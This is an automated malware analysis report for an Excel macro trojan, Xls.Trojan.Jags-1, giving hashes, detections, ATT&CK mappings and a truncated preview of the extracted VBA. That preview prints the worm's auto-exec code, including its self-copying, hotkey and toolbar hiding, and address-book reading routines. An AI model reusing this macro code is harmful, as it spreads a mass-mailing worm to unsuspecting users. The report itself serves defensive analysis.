Xls.Trojan.Jags-1 Office (OLE) malware analysis — malicious · f33476bf52293e10

MALICIOUS

Office (OLE)

97.0 KB Created: 1999-11-25 00:52:00 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 8ae57ee5a966d1a7114113d441d1eec9 SHA-1: d5095c4955c0483448a80b7d49333adcecab52ff SHA-256: f33476bf52293e1040f7e9e2e456045ddaed12874839e1b6563c954a29186976

260 Risk Score

Malware Insights

Xls.Trojan.Jags-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The critical ClamAV detections indicate this is a known malicious Excel macro trojan, likely Jags. The Workbook_Open macro is designed to execute VBA code upon opening, which includes calls to CreateObject and saving a copy of the workbook to the Windows directory. This suggests an attempt to establish persistence and potentially download or execute a second-stage payload.

Heuristics 5

ClamAV: Xls.Trojan.Jags-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Jags-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30551 bytes
SHA-256: `3a3de0f4848e8272718cc7bb0fa79345e5e0021c342981b2319713f2c87559ff`
Detection ClamAV: Xls.Trojan.Jags-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub happyBirthday() On Error Resume Next If Day(Now()) = 17 Then Worksheets(1).Cells(7, 1).Value = "Colombia, September 17, 1978.." Worksheets(1).Cells(6, 1).Value = "Happy Birthday to my brother Christiam (CJGS)" With Worksheets(1).Cells(6, 1).Font .Name = "Arial" .Size = 20 End With End If End Sub Sub Initialize() On Error Resume Next 'nuestra tecnica polimorfica Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls") 'mostramos el mensaje despúes, para no salvarlo en el savecopyas Call happyBirthday 'desactivamos para entrar Call UNLOAD_HOTKEYS Call Ocultar_Barra Call ASOCIAR_JAGS90 Call Read_Your_BookAddress 'ENVIAMOS EL GUSANO 'activamos para no dejar sospecha Call LOAD_HOTKEYS Call Mostrar_Barra End Sub Private Sub Workbook_Open() If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then Call Initialize End If UserForm1.Show End Sub Attribute VB_Name = "Hoja1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range) End Sub Attribute VB_Name = "Hoja2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "get_win_directory" 'OBTENER EL DIRECTORIO WINDOWS Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Function OBTENER_DIR_WINDOWS() As String On Error Resume Next 'OBTENER DIR WINDOWS Dim WinDir As String Dim Cadena As String Dim ret As Long 'OBTENEMOS EL DIR Cadena = String$(300, Chr$(0)) ret = GetWindowsDirectory(Cadena, Len(Cadena)) WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1) OBTENER_DIR_WINDOWS = WinDir End Function Attribute VB_Name = "get_win_user" 'PARA OBTENER EL NOMBRE DE USUARIO DE WINDOWS Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long 'OBTIENE EL NOMBRE DEL USUARIO ACTUAL DE WINDOWS Public Function UsuarioActual() As String On Error Resume Next Dim sBuffer As String Dim lSize As Long Dim sUsuario As String sBuffer = Space$(260) lSize = Len(sBuffer) Call GetUserName(sBuffer, lSize) If lSize > 0 Then sUsuario = Left$(sBuffer, lSize) 'Quitarle el CHR$(0) del final... lSize = InStr(sUsuario, Chr$(0)) If lSize Then sUsuario = Left$(sUsuario, lSize - 1) End If Else sUsuario = Application.UserName End If UsuarioActual = sUsuario End Function Attribute VB_Name = "jags90_others" 'obtiene el nombre de la #$#%# base de datos Function aleatorio(hasta As Integer) As Long Dim x, num num = 0 For x = 1 To hasta Randomize num = num + Rnd() Next x aleatorio = num End Function Function PolyName() As String Dim texto, x, hasta hasta = aleatorio(12) + 1 texto = " " For x = 1 To hasta Mid$(texto, x, 1) = Chr(aleatorio(23) + 64) Next x PolyName = texto End Function Attribute VB_Name = "read_address_book" Function PolyBody() As S ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.